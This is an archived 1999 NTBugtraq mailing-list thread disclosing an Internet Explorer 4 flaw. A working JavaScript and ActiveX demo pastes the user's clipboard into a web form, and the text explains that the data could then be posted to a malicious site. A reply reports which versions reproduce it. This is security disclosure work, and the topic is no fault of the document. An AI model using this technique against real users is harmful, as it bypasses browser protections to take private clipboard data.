Microsoft Internet Explorer 4.x vulnerability in ActiveX object allows remote attacker to obtain local user's clipboard content with simple JavaScript code.
3a9e7508d8e89ab51d6906bf042aed33297223303be07f2cab87430a42c6fa97
Date: Mon, 22 Feb 1999 23:39:07 +0100
From: Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: New IE4 vulnerability : the clipboard again.
Greetings,
I have discovered another IE 4 clipboard vulnerability. The clipboard
content can be made public by a very simple javascript code.
I reported the problem to Microsoft on Feb 10. They confirmed the
problem. It seems that they were already aware of the problem and It
will be fixed in the next IE 4 service pack.
The problem is located in the Internet WebBrowser ActiveX object.
Regards,
Juan Carlos
More info and a demo is available at :
http://pages.whowhere.com/computers/cuartangojc
Regards,
Juan Carlos
The Clipboard vulnerability demo
http://pages.whowhere.lycos.com/computers/cuartangojc/cb.html
----------
<body onload="wb.navigate('http://pages.whowhere.com/computers/cuartangojc/blank.html')">
<script>
function pt()
{
if (document.forms(0).S1.value == "" )
{
wb.focus();
wb.Document.execCommand("paste");
document.forms(0).S1.value = wb.Document.body.innerText;
}
}
function StartJob()
{
document.forms(0).S1.value = "";
wb.focus();
wb.Document.execCommand("paste");
window.setTimeout("pt()",1000);
}
</script>
According with Microsoft security rules access to Windows clipboard content
is forbidden to Internet Explorer scripts unless the clipboard content was
owned by the Explorer itself. If an script performs a paste operation over
an input text box the operation will succeed only if data were copied to
the clipboard from the Internet Explorer.
There is a way to circumvent this protection by using a Microsoft Web Browser
ActiveX control this object can perform a paste operation without security
restrictions. The clipboard data can then be transferred to a form input box
and posted to a malicious WEB.
The box below is a Input Text Area Box your clipboard text data must be here,
if not then do a copy (from any application) and then reload this page.
<form method="POST" action="--WEBBOT-SELF--">
<!--webbot bot="SaveResults" startspan U-File="_private/form_results.txt"
S-Format="TEXT/CSV" S-Label-Fields="TRUE" --><!--webbot bot="SaveResults" endspan --><p><textarea
rows="3" name="S1" cols="82"></textarea></p>
</form>
The box below is a Microsoft Web Browser ActiveX control.
<object classid="clsid:8856F961-340A-11D0-A96B-00C04FD705A2" width="530" height="150"
id="wb">
</object>
---------------------------------------------------------------------------
Date: Wed, 24 Feb 1999 11:21:03 -0500
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: New IE4 vulnerability : the clipboard again.
Marc Berajano said...
>i, like mnemonix, got the access denied error when IE used the
>http://pages.whowhere.lycos.com/computers/cuartangojc/cb.html URL, but
>i don't get that error using the
>http://pages.whowhere.com/computers/cuartangojc/cb.html URL as your
>web page says. however, even when i do use the correct URL, my
>clipboard contents are not shown. i'm using the public beta 2 of IE 5
>(5.00.0910.1309) on NT4 SP4.
and I would add that my clipboard contents DO SHOW using;
NT 4.0 SP1
IE 4.0 version 4.72.3110.8 128-bit SP1, 2735, 2922;
So it seems that the URL makes a big difference to demonstrating Juan
Carlos' vulnerability.
Use http://pages.whowhere.com/computers/cuartangojc/cb.html to test
yourself.
Cheers,
Russ - NTBugtraq moderator